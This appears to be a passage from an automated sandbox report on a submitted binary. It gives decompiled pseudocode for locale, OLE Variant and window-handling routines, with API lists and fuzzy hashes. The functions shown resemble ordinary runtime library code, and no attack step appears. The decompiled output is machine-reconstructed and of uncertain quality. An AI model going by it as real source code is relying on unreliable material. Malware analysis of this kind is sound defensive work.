					_t67 =  *(_t85 + 0x1c);
					__eflags = _t67 - _t83;
					if(_t67 == _t83) {
						_t67 =  *0x45a730; // 0x0
					}
					_t77 =  *(_t85 + 0x18);
					__eflags = _t77;
					if(_t77 == 0) {
						_t77 =  *0x45a740; // 0x0
					}
					_t43 = E0041AED4(_t67);
					__eflags = _t43 - 0xffffffff;
					if(_t43 != 0xffffffff) {
						__eflags = _t43 - _t77;
						if(__eflags == 0) {
							L29:
							_t78 = GetStringTypeA(_t67,  *(_t85 + 8),  *(_t85 + 0xc),  *(_t85 + 0x10),  *(_t85 + 0x14));
							__eflags = _t83;
							if(_t83 != 0) {
								_push(_t83);
								E00412A4D();
							}
							_t45 = _t78;
							goto L32;
						}
						_push(0);
						_push(0);
						_push(_t85 + 0x10);
						_push( *(_t85 + 0xc));
						_push(_t43);
						_push(_t77);
						_t83 = E0041AF17(_t67, _t77, _t83, __eflags);
						__eflags = _t83;
						if(_t83 == 0) {
							goto L25;
						}
						 *(_t85 + 0xc) = _t83;
						goto L29;
					} else {
						goto L25;
					}
				} else {
					if(_t42 != 1) {
						L25:
						_t45 = 0;
						L32:
						return E00412BDF(_t45);
					}
					 *(_t85 - 0x24) = _t83;
					 *(_t85 - 0x20) = _t83;
					if( *(_t85 + 0x18) == _t83) {
						_t62 =  *0x45a740; // 0x0
						 *(_t85 + 0x18) = _t62;
					}
					_t79 = MultiByteToWideChar( *(_t85 + 0x18), 1 + (0 |  *((intOrPtr*)(_t85 + 0x20)) != _t83) * 8,  *(_t85 + 0xc),  *(_t85 + 0x10), _t83, _t83);
					 *(_t85 - 0x28) = _t79;
					if(_t79 == 0) {
						goto L25;
					} else {
						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
						_t68 = _t79 + _t79;
						E00412260(_t79 + _t79 + 0x00000003 & 0xfffffffc, _t69);
						 *(_t85 - 0x18) = _t86;
						_t84 = _t86;
						 *(_t85 - 0x2c) = _t84;
						E00412140(_t84, 0, _t79 + _t79);
						 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
						_t99 = _t84;
						if(_t84 != 0) {
							L15:
							_t58 = MultiByteToWideChar( *(_t85 + 0x18), 1,  *(_t85 + 0xc),  *(_t85 + 0x10), _t84, _t79);
							if(_t58 != 0) {
								 *(_t85 - 0x24) = GetStringTypeW( *(_t85 + 8), _t84, _t58,  *(_t85 + 0x14));
							}
							if( *(_t85 - 0x20) != 0) {
								_push(_t84);
								E00412A4D();
							}
							_t45 =  *(_t85 - 0x24);
							goto L32;
						} else {
							_push(_t79);
							_push(2);
							_t84 = E004146EA(_t68, _t79, _t84, _t99);
							if(_t84 == 0) {
								goto L25;
							}
							 *(_t85 - 0x20) = 1;
							goto L15;
						}
					}
				}
			}



















                                                                              0x00419914
                                                                              0x00419914
                                                                              0x00419916
                                                                              0x0041991b
                                                                              0x00419920
                                                                              0x00419922
                                                                              0x00419928
                                                                              0x00419940
                                                                              0x0041994a
                                                                              0x00419950
                                                                              0x00419953
                                                                              0x00419955
                                                                              0x00419955
                                                                              0x00419942
                                                                              0x00419942
                                                                              0x00419942
                                                                              0x00419940
                                                                              0x0041995f
                                                                              0x00419967
                                                                              0x00419a57
                                                                              0x00419a5a
                                                                              0x00419a5c
                                                                              0x00419a5e
                                                                              0x00419a5e
                                                                              0x00419a64
                                                                              0x00419a67
                                                                              0x00419a69
                                                                              0x00419a6b
                                                                              0x00419a6b
                                                                              0x00419a72
                                                                              0x00419a78
                                                                              0x00419a7b
                                                                              0x00419a81
                                                                              0x00419a83
                                                                              0x00419aa3
                                                                              0x00419ab6
                                                                              0x00419ab8
                                                                              0x00419aba
                                                                              0x00419abc
                                                                              0x00419abd
                                                                              0x00419ac2
                                                                              0x00419ac3
                                                                              0x00000000
                                                                              0x00419ac3
                                                                              0x00419a85
                                                                              0x00419a87
                                                                              0x00419a8c
                                                                              0x00419a8d
                                                                              0x00419a90
                                                                              0x00419a91
                                                                              0x00419a9a
                                                                              0x00419a9c
                                                                              0x00419a9e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00419aa0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00419975
                                                                              0x00419978
                                                                              0x00419a7d
                                                                              0x00419a7d
                                                                              0x00419ac5
                                                                              0x00419acd
                                                                              0x00419acd
                                                                              0x0041997e
                                                                              0x00419981
                                                                              0x00419987
                                                                              0x00419989
                                                                              0x0041998e
                                                                              0x0041998e
                                                                              0x004199b2
                                                                              0x004199b4
                                                                              0x004199b9
                                                                              0x00000000
                                                                              0x004199bf
                                                                              0x004199bf
                                                                              0x004199c3
                                                                              0x004199ce
                                                                              0x004199d3
                                                                              0x004199d6
                                                                              0x004199d8
                                                                              0x004199df
                                                                              0x004199e7
                                                                              0x00419a02
                                                                              0x00419a04
                                                                              0x00419a1d
                                                                              0x00419a2a
                                                                              0x00419a32
                                                                              0x00419a42
                                                                              0x00419a42
                                                                              0x00419a49
                                                                              0x00419a4b
                                                                              0x00419a4c
                                                                              0x00419a51
                                                                              0x00419a52
                                                                              0x00000000
                                                                              0x00419a06
                                                                              0x00419a06
                                                                              0x00419a07
                                                                              0x00419a10
                                                                              0x00419a14
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00419a16
                                                                              0x00000000
                                                                              0x00419a16
                                                                              0x00419a04
                                                                              0x004199b9

                                                                              APIs
                                                                              • GetStringTypeW.KERNEL32(00000001,0044BD1C,00000001,?,0044C670,0000001C,004135F2,00000001,00000020,00000100,?,00000000), ref: 00419938
                                                                              • GetLastError.KERNEL32 ref: 0041994A
                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000000,004138C3,00000000,00000000,0044C670,0000001C,004135F2,00000001,00000020,00000100,?,00000000), ref: 004199AC
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,00000000,004138C3,?,00000000), ref: 00419A2A
                                                                              • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 00419A3C
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 3581945363-0
                                                                              • Opcode ID: 34c54c4d83cc0e6e6419d8d521f45a16043b779db807584da7b052a505759e70
                                                                              • Instruction ID: 97e70e5a9afb8e25a7a1206e643ab233fd1233c46a0855ec883214398f933a41
                                                                              • Opcode Fuzzy Hash: 34c54c4d83cc0e6e6419d8d521f45a16043b779db807584da7b052a505759e70
                                                                              • Instruction Fuzzy Hash: 6B41D072900355ABCF218F50DC46AEF3B75FF487A0F14411AF814A6291C779CDA4CBA9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004105BF, Relevance: 9.1, APIs: 6, Instructions: 137COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 41%
                                                                              			E004105BF(void* __ecx, void* __edx) {
				signed int _t73;
				intOrPtr _t85;
				intOrPtr* _t89;
				intOrPtr* _t92;
				intOrPtr* _t94;
				void* _t99;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t122;
				void* _t124;
				void* _t126;
				void* _t128;
				void* _t129;

				_t117 = __edx;
				E004128A0(E004312F2, _t126);
				_t129 = _t128 - 0x6c;
				_t73 = 0;
				_t124 = __ecx;
				 *((intOrPtr*)(__ecx + 0x44)) = 1;
				 *(_t126 - 0x10) = 0;
				 *(_t126 - 0x18) = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L21:
					 *(_t124 + 0x44) =  *(_t124 + 0x44) & 0x00000000;
					 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
					return 0;
				}
				do {
					_t109 =  *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x14)) + (_t73 + _t73 * 4 << 3) + 0x24));
					if(_t109 == 0) {
						goto L19;
					}
					_t110 =  *((intOrPtr*)(_t109 + 4));
					 *((intOrPtr*)(_t126 - 0x20)) = _t110;
					if(_t110 == 0) {
						goto L19;
					}
					 *(_t126 - 0x14) =  *(_t126 - 0x10) << 4;
					do {
						_t122 =  *((intOrPtr*)(E00409D70(_t126 - 0x20)));
						 *((intOrPtr*)(_t126 - 0x24)) = 0xfffffffd;
						E00412140(_t126 - 0x78, 0, 0x20);
						_t129 = _t129 + 0xc;
						E0041162C(_t126 - 0x48);
						 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
						_t135 =  *((intOrPtr*)(_t124 + 0x48));
						if( *((intOrPtr*)(_t124 + 0x48)) == 0) {
							_t85 =  *((intOrPtr*)(_t124 + 0x40)) +  *(_t126 - 0x14);
							__eflags = _t85;
						} else {
							_t99 = E00410097(_t124, _t117, _t135, _t126 - 0x58,  *(_t126 - 0x18) + 1);
							 *(_t126 - 4) = 1;
							E00411612(_t99, _t126 - 0x48, _t99);
							 *(_t126 - 4) = 0;
							__imp__#9(_t126 - 0x58);
							_t85 = _t126 - 0x48;
						}
						 *((intOrPtr*)(_t126 - 0x38)) = _t85;
						 *((intOrPtr*)(_t126 - 0x34)) = _t126 - 0x24;
						 *((intOrPtr*)(_t126 - 0x30)) = 1;
						 *((intOrPtr*)(_t126 - 0x2c)) = 1;
						 *(_t122 + 0x84) = 1;
						_t89 =  *((intOrPtr*)(_t122 + 0x4c));
						if(_t89 != 0) {
							_t117 = _t126 - 0x1c;
							_push(_t126 - 0x1c);
							_push(0x44dd5c);
							_push(_t89);
							if( *((intOrPtr*)( *_t89))() >= 0) {
								_t92 =  *((intOrPtr*)(_t126 - 0x1c));
								_t117 = _t126 - 0x38;
								 *((intOrPtr*)( *_t92 + 0x18))(_t92,  *((intOrPtr*)(_t122 + 0x98)), 0x44ddcc, 0, 4, _t126 - 0x38, 0, _t126 - 0x78, _t126 - 0x28);
								_t94 =  *((intOrPtr*)(_t126 - 0x1c));
								 *((intOrPtr*)( *_t94 + 8))(_t94);
								 *(_t122 + 0x84) =  *(_t122 + 0x84) & 0x00000000;
								if( *((intOrPtr*)(_t126 - 0x74)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x74)));
								}
								if( *((intOrPtr*)(_t126 - 0x70)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x70)));
								}
								if( *((intOrPtr*)(_t126 - 0x6c)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x6c)));
								}
								 *(_t126 - 0x10) =  *(_t126 - 0x10) + 1;
								 *(_t126 - 0x14) =  *(_t126 - 0x14) + 0x10;
							}
						}
						 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
						__imp__#9(_t126 - 0x48);
					} while ( *((intOrPtr*)(_t126 - 0x20)) != 0);
					_t73 =  *(_t126 - 0x18);
					L19:
					_t73 = _t73 + 1;
					 *(_t126 - 0x18) = _t73;
				} while (_t73 <  *((intOrPtr*)(_t124 + 0x10)));
				goto L21;
			}
















                                                                              0x004105bf
                                                                              0x004105c4
                                                                              0x004105c9
                                                                              0x004105cc
                                                                              0x004105cf
                                                                              0x004105d4
                                                                              0x004105db
                                                                              0x004105de
                                                                              0x004105e1
                                                                              0x0041074c
                                                                              0x0041074c
                                                                              0x00410756
                                                                              0x0041075e
                                                                              0x0041075e
                                                                              0x004105e9
                                                                              0x004105f2
                                                                              0x004105f8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004105fe
                                                                              0x00410603
                                                                              0x00410606
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00410612
                                                                              0x00410615
                                                                              0x00410625
                                                                              0x0041062f
                                                                              0x00410636
                                                                              0x0041063b
                                                                              0x00410642
                                                                              0x00410647
                                                                              0x0041064b
                                                                              0x0041064f
                                                                              0x00410684
                                                                              0x00410684
                                                                              0x00410651
                                                                              0x0041065c
                                                                              0x00410665
                                                                              0x00410669
                                                                              0x00410672
                                                                              0x00410676
                                                                              0x0041067c
                                                                              0x0041067c
                                                                              0x00410687
                                                                              0x0041068d
                                                                              0x00410693
                                                                              0x00410696
                                                                              0x00410699
                                                                              0x0041069f
                                                                              0x004106a4
                                                                              0x004106a8
                                                                              0x004106ab
                                                                              0x004106ac
                                                                              0x004106b1
                                                                              0x004106b6
                                                                              0x004106b8
                                                                              0x004106c7
                                                                              0x004106db
                                                                              0x004106de
                                                                              0x004106e4
                                                                              0x004106e7
                                                                              0x004106f2
                                                                              0x004106f7
                                                                              0x004106f7
                                                                              0x00410701
                                                                              0x00410706
                                                                              0x00410706
                                                                              0x00410710
                                                                              0x00410715
                                                                              0x00410715
                                                                              0x0041071b
                                                                              0x0041071e
                                                                              0x0041071e
                                                                              0x004106b6
                                                                              0x00410722
                                                                              0x0041072a
                                                                              0x00410730
                                                                              0x0041073a
                                                                              0x0041073d
                                                                              0x0041073d
                                                                              0x00410741
                                                                              0x00410741
                                                                              0x00000000

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 004105C4
                                                                              • VariantClear.OLEAUT32(?), ref: 00410676
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004106F7
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00410706
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00410715
                                                                              • VariantClear.OLEAUT32(00000000), ref: 0041072A
                                                                                • Part of subcall function 00410097: __EH_prolog.LIBCMT ref: 0041009C
                                                                                • Part of subcall function 00410097: VariantClear.OLEAUT32(?), ref: 004100FE
                                                                                • Part of subcall function 00411612: VariantCopy.OLEAUT32(?,?), ref: 0041161A
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearFreeString$H_prolog$Copy
                                                                              • String ID:
                                                                              • API String ID: 3098219910-0
                                                                              • Opcode ID: eab87efa52ee99567b57d9f639eea13987402111c4ae0d0fd517355a8fb88391
                                                                              • Instruction ID: 85d627a782305c6a27c3470648538f77c5723829fa7d2679dc32c5e27cd45aa6
                                                                              • Opcode Fuzzy Hash: eab87efa52ee99567b57d9f639eea13987402111c4ae0d0fd517355a8fb88391
                                                                              • Instruction Fuzzy Hash: B8513BB1900209DFDB24DFA4C984BEEBBB8FF48304F10452AE116E7291D7B5A985CF64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042B4D1, Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042B4D1(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E0042B498();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x1c);
					goto L7;
				}
				_t13 = E00408116();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}









                                                                              0x0042b4d9
                                                                              0x0042b4e1
                                                                              0x0042b4e3
                                                                              0x0042b500
                                                                              0x0042b50e
                                                                              0x0042b519
                                                                              0x0042b51b
                                                                              0x0042b51d
                                                                              0x0042b51f
                                                                              0x0042b52a
                                                                              0x0042b52c
                                                                              0x0042b539
                                                                              0x0042b539
                                                                              0x0042b53b
                                                                              0x0042b541
                                                                              0x0042b545
                                                                              0x0042b563
                                                                              0x0042b556
                                                                              0x0042b559
                                                                              0x0042b55b
                                                                              0x0042b55b
                                                                              0x0042b545
                                                                              0x0042b56c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042b521
                                                                              0x0042b521
                                                                              0x0042b522
                                                                              0x0042b524
                                                                              0x0042b526
                                                                              0x00000000
                                                                              0x0042b521
                                                                              0x0042b513
                                                                              0x0042b515
                                                                              0x0042b517
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042b517
                                                                              0x0042b4e5
                                                                              0x0042b4ec
                                                                              0x0042b4fb
                                                                              0x0042b4fb
                                                                              0x00000000
                                                                              0x0042b4fb
                                                                              0x0042b4ee
                                                                              0x0042b4f5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042b4f7
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                              • String ID:
                                                                              • API String ID: 670545878-0
                                                                              • Opcode ID: 95e328cc6c4add9bda531c8189a7f2f5860e3f2c31ffa614b97492a06306aa9b
                                                                              • Instruction ID: 43f622d831046ced162240069887d2157db7c7602340c0cd1b66217376ed21cf
                                                                              • Opcode Fuzzy Hash: 95e328cc6c4add9bda531c8189a7f2f5860e3f2c31ffa614b97492a06306aa9b
                                                                              • Instruction Fuzzy Hash: 4A11C132301631678621AA6ABD8072BB398DF65B68F95012BEC00DB311EBA8DD8142DD
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042ACB3, Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 38%
                                                                              			E0042ACB3(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}






                                                                              0x0042acc2
                                                                              0x0042acce
                                                                              0x0042acd0
                                                                              0x0042ad13
                                                                              0x0042ad13
                                                                              0x0042ad15
                                                                              0x0042ad19
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042acdf
                                                                              0x0042acf6
                                                                              0x0042acfc
                                                                              0x0042ad0e
                                                                              0x00000000
                                                                              0x0042ad21
                                                                              0x0042ad0e
                                                                              0x0042ad10
                                                                              0x0042ad12
                                                                              0x0042ad12
                                                                              0x0042ad1e

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rect$ClientCtrlLongScreen
                                                                              • String ID:
                                                                              • API String ID: 1315500227-0
                                                                              • Opcode ID: dbdc1b5fa6172663c6096589d8edfa90ac923ddac20c32444a2081ee88a8308c
                                                                              • Instruction ID: 6bd5241dd8d81b189ddff31684821fd5ff96e47c232e402118d2efec229488b6
                                                                              • Opcode Fuzzy Hash: dbdc1b5fa6172663c6096589d8edfa90ac923ddac20c32444a2081ee88a8308c
                                                                              • Instruction Fuzzy Hash: D001A232200129ABDB11AF54AD08FEF376DEF04351F944026FE01E2150D778DA218BA9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00415B10, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 95%
                                                                              			E00415B10(void* __ebx, void* __edi, void* __esi, char* _a4, char* _a8, short* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v152;
				intOrPtr _t19;
				void* _t20;
				char* _t23;
				void* _t26;
				void* _t36;
				void* _t37;
				void* _t40;
				short* _t52;
				intOrPtr* _t53;
				void* _t55;
				char* _t59;
				void* _t61;
				void* _t62;

				_t55 = __edi;
				_t37 = __ebx;
				_t19 =  *0x457184; // 0xc72e1596
				_t59 = _a4;
				_v8 = _t19;
				if(_t59 != 0) {
					if( *_t59 != 0x43 ||  *((char*)(_t59 + 1)) != 0) {
						_push(_t37);
						_t20 = E00411A30(_t59);
						_t40 = _t55;
						if(_t20 >= 0x82) {
							L11:
							if(E004158EC(_t40,  &_v152, _t59) != 0) {
								L13:
								_t23 = 0;
								L23:
								goto L24;
							}
							_t26 = E0041C4D8(0,  &_v152, 0x45a5a4,  &_v152);
							_t62 = _t61 + 0xc;
							if(_t26 != 0) {
								 *0x45a5ac =  *0x45a5a8 & 0x0000ffff;
								E004159C8(_t59, 0x457640,  &_v152);
								if( *_t59 == 0 || E00411A30(_t59) >= 0x82) {
									_t59 = 0x4326f8;
								}
								 *0x45763a = 0;
								E0041ADB0(0x4575b8, _t59, 0x82);
								_t61 = _t62 + 0xc;
								L18:
								if(_a12 != 0) {
									E00411AC0(_a12, 0x45a5a4, 6);
									_t61 = _t61 + 0xc;
								}
								if(_a16 != 0) {
									E00411AC0(_a16, 0x45a5ac, 4);
								}
								E00419460(_a8, 0x457640);
								_t23 = 0x457640;
								goto L23;
							}
							goto L13;
						}
						if(E00416EE0(0x457640, _t59) == 0) {
							goto L18;
						}
						_t36 = E00416EE0(0x4575b8, _t59);
						_pop(_t40);
						if(_t36 == 0) {
							goto L18;
						}
						goto L11;
					} else {
						_t23 = _a8;
						_t52 = _a12;
						 *_t23 = 0x43;
						 *((char*)(_t23 + 1)) = 0;
						if(_t52 != 0) {
							 *_t52 = 0;
							 *((short*)(_t52 + 2)) = 0;
							 *((short*)(_t52 + 4)) = 0;
						}
						_t53 = _a16;
						if(_t53 != 0) {
							 *_t53 = 0;
						}
						L24:
						return E00412FBB(_t23, _v8);
					}
				}
				_t23 = 0;
				goto L24;
			}


















                                                                              0x00415b10
                                                                              0x00415b10
                                                                              0x00415b19
                                                                              0x00415b1f
                                                                              0x00415b26
                                                                              0x00415b29
                                                                              0x00415b35
                                                                              0x00415b6b
                                                                              0x00415b6e
                                                                              0x00415b7a
                                                                              0x00415b80
                                                                              0x00415ba4
                                                                              0x00415bb5
                                                                              0x00415bd0
                                                                              0x00415bd0
                                                                              0x00415c5f
                                                                              0x00000000
                                                                              0x00415c60
                                                                              0x00415bc4
                                                                              0x00415bc9
                                                                              0x00415bce
                                                                              0x00415bde
                                                                              0x00415bef
                                                                              0x00415bf9
                                                                              0x00415c06
                                                                              0x00415c06
                                                                              0x00415c0e
                                                                              0x00415c15
                                                                              0x00415c1a
                                                                              0x00415c1d
                                                                              0x00415c21
                                                                              0x00415c2d
                                                                              0x00415c32
                                                                              0x00415c32
                                                                              0x00415c39
                                                                              0x00415c45
                                                                              0x00415c4a
                                                                              0x00415c56
                                                                              0x00415c5d
                                                                              0x00000000
                                                                              0x00415c5d
                                                                              0x00000000
                                                                              0x00415bce
                                                                              0x00415b91
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415b99
                                                                              0x00415ba1
                                                                              0x00415ba2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415b3d
                                                                              0x00415b3d
                                                                              0x00415b40
                                                                              0x00415b45
                                                                              0x00415b48
                                                                              0x00415b4c
                                                                              0x00415b4e
                                                                              0x00415b51
                                                                              0x00415b55
                                                                              0x00415b55
                                                                              0x00415b59
                                                                              0x00415b5e
                                                                              0x00415b64
                                                                              0x00415b64
                                                                              0x00415c61
                                                                              0x00415c6b
                                                                              0x00415c6b
                                                                              0x00415b35
                                                                              0x00415b2b
                                                                              0x00000000

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @vE
                                                                              • API String ID: 0-4027072445
                                                                              • Opcode ID: d3dee81b3df11f8ae4f38b2767deaf8127efefd7da99a67e80e8a253e3816d11
                                                                              • Instruction ID: e540ec56f7d4265e4339a02ba9b599a70780e187e7edd262bb5e60d86974fcfc
                                                                              • Opcode Fuzzy Hash: d3dee81b3df11f8ae4f38b2767deaf8127efefd7da99a67e80e8a253e3816d11
                                                                              • Instruction Fuzzy Hash: 42313C71609704EADB249F21ED41FDB3B95DF80319F24406BF90992282F63C89C0C69E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042654B, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042654B(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				long _t34;
				long _t43;
				struct HWND__* _t48;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E004239C5();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x1c)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x1c)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x20)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x44));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x44)) = 0;
				}
				_t64 =  *(_t72 + 0x48);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x48) =  *(_t72 + 0x48) & 0x00000000;
				if(( *(_t72 + 0x38) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E0042D19F() + 0x3c));
					if(_t71 != 0 &&  *(_t71 + 0x1c) != 0) {
						E00412140( &_v52, 0, 0x30);
						_t48 =  *(_t72 + 0x1c);
						_v44 = _t48;
						_v40 = _t48;
						_v52 = 0x28;
						_v48 = 1;
						SendMessageA( *(_t71 + 0x1c), 0x405, 0,  &_v52);
					}
				}
